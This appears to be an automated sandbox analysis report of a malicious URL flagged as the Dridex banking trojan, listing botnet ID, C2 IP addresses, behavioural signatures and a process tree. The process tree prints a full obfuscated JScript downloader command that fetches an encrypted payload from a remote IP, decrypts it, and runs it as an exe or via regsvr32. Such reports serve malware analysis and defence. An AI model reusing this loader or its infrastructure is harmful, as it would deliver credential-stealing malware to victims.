Analysis
- max time kernel: 131s
- max time network: 154s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 10-09-2021 00:52

Tasks (sample for every URLScan and behavioral task: https://ankltrafficexit.xyz/trafficexit)
- Static task: static1
- URLScan task: urlscan1
- Behavioral task: behavioral1, resource win7-jp
- Behavioral task: behavioral2, resource win7-fr
- Behavioral task: behavioral3, resource win7v20210408
- Behavioral task: behavioral4, resource win7-de
- Behavioral task: behavioral5, resource win10v20210408
- Behavioral task: behavioral6, resource win10-jp
- Behavioral task: behavioral7, resource win10-fr
- Behavioral task: behavioral8, resource win10-en
- Behavioral task: behavioral9, resource win10-de
General
Malware Config
- Extracted family: dridex
- Botnet: 10111
- C2:
  104.152.111.198:9676
  92.247.29.75:10172
  133.242.136.130:8194
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes: wscript.exe (flow 25, PID 2844)
- Executes dropped EXE (1 IoCs)
  Processes: xkrzk.exe (PID 3940)
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
  Processes: xkrzk.exe, key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies Internet Explorer settings
  Processes: iexplore.exe, IEXPLORE.EXE (keys created and values set under the user's Software\Microsoft\Internet Explorer registry tree)
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes: iexplore.exe (PID 664)
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: iexplore.exe (PID 664)
- Suspicious use of SetWindowsHookEx (6 IoCs)
  Processes: iexplore.exe (PID 664, 2 hits), IEXPLORE.EXE (PID 3948, 4 hits)
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes (source PID and process -> target PID and process; each pair recorded 3 times):
  664 iexplore.exe -> 3948 IEXPLORE.EXE
  3948 IEXPLORE.EXE -> 712 cmd.exe
  712 cmd.exe -> 2844 wscript.exe
  2844 wscript.exe -> 3476 cmd.exe
Processes (process tree, indented by depth)
- C:\Program Files\Internet Explorer\iexplore.exe
  Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
  - Modifies Internet Explorer settings
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:664 CREDAT:82945 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\wscript.exe
        Command line: wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NTk1NzM2&JGsABzK&fhfghddfsdf=twix&dsfdffg43t=TKNbP0fOH0eD2MjN2LHTRcHsLlni0urBDV2rtl7yQ1mH9PoufLZQO1fijE2Fc1AznI0PUF5H8K6si0WBwUXNgp_R-CWPYAh1otKWJA&ogfgafgn4=wH3QMvXcJwDMFYPJKeXD&sdfsdfdfg=why&cxssdvxcv=109hbobs.102fq101.406y2p1j0&IHTvMTk4NjI=" "2""
        - Blocklisted process makes network request
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c xkrzk.exe
          - C:\Users\Admin\AppData\Local\Temp\xkrzk.exe
            Command line: xkrzk.exe
            - Executes dropped EXE
            - Checks whether UAC is enabled